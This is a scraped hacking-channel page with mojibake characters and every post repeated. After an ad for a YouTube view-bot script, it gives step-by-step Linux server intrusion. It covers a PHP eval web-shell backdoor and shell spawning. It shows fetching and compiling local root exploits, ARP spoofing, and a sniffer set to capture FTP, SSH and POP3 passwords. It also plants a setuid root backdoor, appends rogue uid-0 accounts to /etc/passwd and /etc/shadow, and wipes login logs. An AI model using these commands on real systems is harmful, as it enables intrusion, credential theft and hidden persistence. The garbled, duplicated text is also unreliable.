π¦ T.me Small Termux -Kali Script for increase youtube views
1) git clone https://github.com/Pure-L0G1C/YouTubeViews
2) go to cd YouTubeViews
3) Run as :
python youtube.py [visits] [youtubeLinks
π¦ T.me Small Termux -Kali Script for increase youtube views
1) git clone https://github.com/Pure-L0G1C/YouTubeViews
2) go to cd YouTubeViews
3) Run as :
python youtube.py [visits] [youtubeLinks
GitHub
GitHub - Bitwise-01/YouTubeViews-: YouTube view bot
YouTube view bot. Contribute to Bitwise-01/YouTubeViews- development by creating an account on GitHub.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Common commands for hacking Linux servers
Let s write a php sentence back door: part 1
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) echo -e "<?php @eval($_POST[md5])?>" >rankuplog_time.php
2) cat rankuplog_time.php
π¦ linux think of cross-site first.
1) Shell browsing target station is not working, type in the command line
ls -la /www.users/
2) Overflow and elevation
# python βc βimpotr pty;pty.spawn(β/bin/shβ);
3) To get an interactive shell, python is installed by default on most systems
> Enter id
4) bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
5) Here uid = 529 (zeicom) is not yet root authority,(example)
Enter uname -r
to return: 2.6.18-164.11.1.el5PAE
6) Linux elevation can be roughly divided into
7) Third-party software vulnerabilities
Local trust feature
Kernel overflow
Find the corresponding exp
8) The address is organized here. You can download it here.
http://www.exploit-db.com/search/
9) Enter pwd. This command displays the current directory.
See if you can compile gcc -help
10) The current directory is the directory of the shell, I uploaded 2.c in the shell
11) Bounce the shell to port 12345 of your own machine on the Internet
Nc -lvvp 12345 is monitored locally on the Internet server
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Common commands for hacking Linux servers
Let s write a php sentence back door: part 1
fb.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) echo -e "<?php @eval($_POST[md5])?>" >rankuplog_time.php
2) cat rankuplog_time.php
π¦ linux think of cross-site first.
1) Shell browsing target station is not working, type in the command line
ls -la /www.users/
2) Overflow and elevation
# python βc βimpotr pty;pty.spawn(β/bin/shβ);
3) To get an interactive shell, python is installed by default on most systems
> Enter id
4) bash-3.2$ id
uid=529(zeicom) gid=525(zeicom) groups=525(zeicom)
bash-3.2$
5) Here uid = 529 (zeicom) is not yet root authority,(example)
Enter uname -r
to return: 2.6.18-164.11.1.el5PAE
6) Linux elevation can be roughly divided into
7) Third-party software vulnerabilities
Local trust feature
Kernel overflow
Find the corresponding exp
8) The address is organized here. You can download it here.
http://www.exploit-db.com/search/
9) Enter pwd. This command displays the current directory.
See if you can compile gcc -help
10) The current directory is the directory of the shell, I uploaded 2.c in the shell
11) Bounce the shell to port 12345 of your own machine on the Internet
Nc -lvvp 12345 is monitored locally on the Internet server
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacking A Linux Server
Case when you can get an apache interactive shell sometimes not work-
Recompile arpsniffer methode
part 2
instagram.com/UndercOdeTestingCompany
> At this moment
type in terminal
1) python -c impotr pty;pty.spawn("/bin/sh");
then
2) cd /tmp
3) mkdir Papers
4) cd Papers
5) pwd
6) Then enter the command
7) wget exp. URL..
8) Compile 2.c into executable g ++ keio.cc -o keio
gcc βo 2 2.c
9) Give 2 have execute permission
> chmod +x 2
10) Implementation 2, overflow
./2
1
carried out
11) gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
12) Make sure that arpsniffer.c requires pcap and libnet.
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
13) wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
14) tar zxvf libpcap-0.8.1.tar.gz
15) cd libpcap-0.8.1
16) ./configure
> make
make install
π¦ Recompile arpsniffer.c
and execute again
> gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
There was no error this time, and the compilation was successful.
Run
> ./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Hacking A Linux Server
Case when you can get an apache interactive shell sometimes not work-
Recompile arpsniffer methode
part 2
instagram.com/UndercOdeTestingCompany
> At this moment
type in terminal
1) python -c impotr pty;pty.spawn("/bin/sh");
then
2) cd /tmp
3) mkdir Papers
4) cd Papers
5) pwd
6) Then enter the command
7) wget exp. URL..
8) Compile 2.c into executable g ++ keio.cc -o keio
gcc βo 2 2.c
9) Give 2 have execute permission
> chmod +x 2
10) Implementation 2, overflow
./2
1
carried out
11) gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
12) Make sure that arpsniffer.c requires pcap and libnet.
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
13) wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
14) tar zxvf libpcap-0.8.1.tar.gz
15) cd libpcap-0.8.1
16) ./configure
> make
make install
π¦ Recompile arpsniffer.c
and execute again
> gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
There was no error this time, and the compilation was successful.
Run
> ./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Start cheating Gateway For Any Server :
Because it is server-side, so we cheat Gateway:
(network environment is as follows, the mail server ip: 192.168.0.11 Gateway: 192.168.0.1 the machine: 192.168.0.77)
execution
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
Use tcpdump to monitor in another login
tcpdump -i eth0 host 192.168.0.11
Found data, save the monitored data in the file:
tcpdump -i eth0 host 172.16.0.12 -w pop.txt
Stop after 10 minutes, download the pop.txt to the local with the sz command under SecureCRT, and then analyze it with Ethereal.
Now we can use linsniffer to listen to the username and password we want.
First modify linsniffer.c: listen to the corresponding application password according to your needs. Mine is as follows:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
π¦ Compile and execute
[root@pibigstar root]# gcc -o linsniffer linsniffer.c
Will prompt below
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c: 32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include < endian.h> instead!
Regardless of the warning, just run the compiled linsniffer.
[root@pibigstar root]# ./linsniffer
The username and password are automatically saved to tcp.log
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Start cheating Gateway For Any Server :
Because it is server-side, so we cheat Gateway:
(network environment is as follows, the mail server ip: 192.168.0.11 Gateway: 192.168.0.1 the machine: 192.168.0.77)
execution
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
Use tcpdump to monitor in another login
tcpdump -i eth0 host 192.168.0.11
Found data, save the monitored data in the file:
tcpdump -i eth0 host 172.16.0.12 -w pop.txt
Stop after 10 minutes, download the pop.txt to the local with the sz command under SecureCRT, and then analyze it with Ethereal.
Now we can use linsniffer to listen to the username and password we want.
First modify linsniffer.c: listen to the corresponding application password according to your needs. Mine is as follows:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
π¦ Compile and execute
[root@pibigstar root]# gcc -o linsniffer linsniffer.c
Will prompt below
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c: 32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include < endian.h> instead!
Regardless of the warning, just run the compiled linsniffer.
[root@pibigstar root]# ./linsniffer
The username and password are automatically saved to tcp.log
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How To Get and Use Cross-Site Code against any LInux ?
Linux does not elevate code for cross-directory access
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Linux permissions are usually more loose, but some virtual machines still cannot be accessed across directories.
2) In the case of no rights, try the following code. If you are lucky, you may have passed.
> code show as below:
$path = stripslashes($_GET[ path ]);
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>
3) Save the above code as tmdsb.PHP
4) Then visit http://www.tmdsb.com/tmdsb.php?path=.../.../the directory to cross / index.php
(example site)
Here index.PHP is the file whose permissions need to be modified.
5) Collected another exp:
6) Save the following code as exp. PHP
Code:
@$filename = stripslashes($_POST[ filename ]);
@$mess = stripslashes($_POST[ mess ]);
$fp = @fopen({$_POST[ filename ]}, a );
@fputs($fp,$mess
);
@fclose($fp);
?>
AFter Using All Parts sended here Finally Linux Kernel <2.6.19 udp_sendmsg Local Root Exploit (x86 / x64) This 0day overflow was successful
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How To Get and Use Cross-Site Code against any LInux ?
Linux does not elevate code for cross-directory access
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Linux permissions are usually more loose, but some virtual machines still cannot be accessed across directories.
2) In the case of no rights, try the following code. If you are lucky, you may have passed.
> code show as below:
$path = stripslashes($_GET[ path ]);
$ok = chmod ($path , 0777);
if ($ok == true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>
3) Save the above code as tmdsb.PHP
4) Then visit http://www.tmdsb.com/tmdsb.php?path=.../.../the directory to cross / index.php
(example site)
Here index.PHP is the file whose permissions need to be modified.
5) Collected another exp:
6) Save the following code as exp. PHP
Code:
@$filename = stripslashes($_POST[ filename ]);
@$mess = stripslashes($_POST[ mess ]);
$fp = @fopen({$_POST[ filename ]}, a );
@fputs($fp,$mess
);
@fclose($fp);
?>
AFter Using All Parts sended here Finally Linux Kernel <2.6.19 udp_sendmsg Local Root Exploit (x86 / x64) This 0day overflow was successful
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Linux Backdoor-Let s get full controle :
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
> Udev elevation
1) Changed the udev privilege, applicable to the kernel range of 2.6. *.
2) Still upload the file to the directory where the server shell is located, execute the command ls, find that the file is lying there, and then grant the execute permission to exp.
chmod +x pwnkernel.c
chmod +x wunderbar_emporium.sh
chmod +x exploit.c
3) After execution ./w*overflow
Successful overflow, root permissions.
Leave to IS A that the After Back Door ~ the Add User A the root, the I do Not Mind. . .
useradd -u 0 -o "username"
1
Enter commands one by one
cd /tmp
ls /lib/ld-linux*
cp /lib/ld-linux.so.2 /tmp/.str1ven
ls -l .str1ven
chmod +s .str1ven
ls -l .str1ven
-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven
4) Create a backdoor successfully, exit root, execute
./.str1ven
5) Successfully obtained root permissions ~~
cat /etc/passwd
cat /etc/shadow
cat /etc/sysconfig/network-scripts/ifcfg-ethn
ifconfig
cat /etc/resolv.conf
bash -i
bash prompt:
6) When you enter as an ordinary user with limited rights, you usually have a prompt similar to bash $. When you log in as Root, your prompt will become bash #.
7) System variables:
try the echo "$USER / $EUID"system and it should tell you what users it thinks you are.
echo 1>/proc/sys/net/ipv4/if_forward,1>/proc/sys/net/ipv4/ip_forward
vim /proc/sys/net/ipv4/ip_forward
netstat -an |grep LISTEN |grep :80
service --status-all | grep running
service --status-all | grep http
lsb_release -a
/usr/sbin/sshd stop/
usr/sbin/sshd start
ssd_config file
PasswordAuthentication no
Change it to
PasswordAuthentication yes
Remote ssh can log in
Otherwise displayAccess denied
8) Usepam yes may be used to establish pam login, such as ssh from other Linux hosts to the server. If closed, it cannot be opened.
Novice usage of su
first
chomod 777 /etc/passwd
9) Then change the gid and uid of the bin user to 0
Then passwd set the bin password
then
cp /bin/bash /sbin/nologin
Then su
su - bin
10) You can go to the rootshell.
The principle is that when ssh does not allow root to log in with the ssh terminal, we do not know the root password in a very novice way.
It's okay
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c βo local βstatic βWall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
cp /dev/null /var/log/wtm
11) Create a 100m large file to use when using Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit
dd if=/dev/zero of=yourfile bs=10M count=10
/etc/init.d/ssh start
/etc/ssh/sshd_config
π¦Well Done! -remember exploiting others linux is illegal
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Linux Backdoor-Let s get full controle :
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
> Udev elevation
1) Changed the udev privilege, applicable to the kernel range of 2.6. *.
2) Still upload the file to the directory where the server shell is located, execute the command ls, find that the file is lying there, and then grant the execute permission to exp.
chmod +x pwnkernel.c
chmod +x wunderbar_emporium.sh
chmod +x exploit.c
3) After execution ./w*overflow
Successful overflow, root permissions.
Leave to IS A that the After Back Door ~ the Add User A the root, the I do Not Mind. . .
useradd -u 0 -o "username"
1
Enter commands one by one
cd /tmp
ls /lib/ld-linux*
cp /lib/ld-linux.so.2 /tmp/.str1ven
ls -l .str1ven
chmod +s .str1ven
ls -l .str1ven
-rwsr-sr-x 1 root root 121684 07-08 21:13 .str1ven
4) Create a backdoor successfully, exit root, execute
./.str1ven
which whoami5) Successfully obtained root permissions ~~
cat /etc/passwd
cat /etc/shadow
cat /etc/sysconfig/network-scripts/ifcfg-ethn
ifconfig
cat /etc/resolv.conf
bash -i
bash prompt:
6) When you enter as an ordinary user with limited rights, you usually have a prompt similar to bash $. When you log in as Root, your prompt will become bash #.
7) System variables:
try the echo "$USER / $EUID"system and it should tell you what users it thinks you are.
echo 1>/proc/sys/net/ipv4/if_forward,1>/proc/sys/net/ipv4/ip_forward
vim /proc/sys/net/ipv4/ip_forward
netstat -an |grep LISTEN |grep :80
service --status-all | grep running
service --status-all | grep http
lsb_release -a
/usr/sbin/sshd stop/
usr/sbin/sshd start
ssd_config file
PasswordAuthentication no
Change it to
PasswordAuthentication yes
Remote ssh can log in
Otherwise displayAccess denied
8) Usepam yes may be used to establish pam login, such as ssh from other Linux hosts to the server. If closed, it cannot be opened.
Novice usage of su
first
chomod 777 /etc/passwd
9) Then change the gid and uid of the bin user to 0
Then passwd set the bin password
then
cp /bin/bash /sbin/nologin
Then su
su - bin
10) You can go to the rootshell.
The principle is that when ssh does not allow root to log in with the ssh terminal, we do not know the root password in a very novice way.
It's okay
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c βo local βstatic βWall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
cp /dev/null /var/log/wtm
11) Create a 100m large file to use when using Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit
dd if=/dev/zero of=yourfile bs=10M count=10
/etc/init.d/ssh start
/etc/ssh/sshd_config
π¦Well Done! -remember exploiting others linux is illegal
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β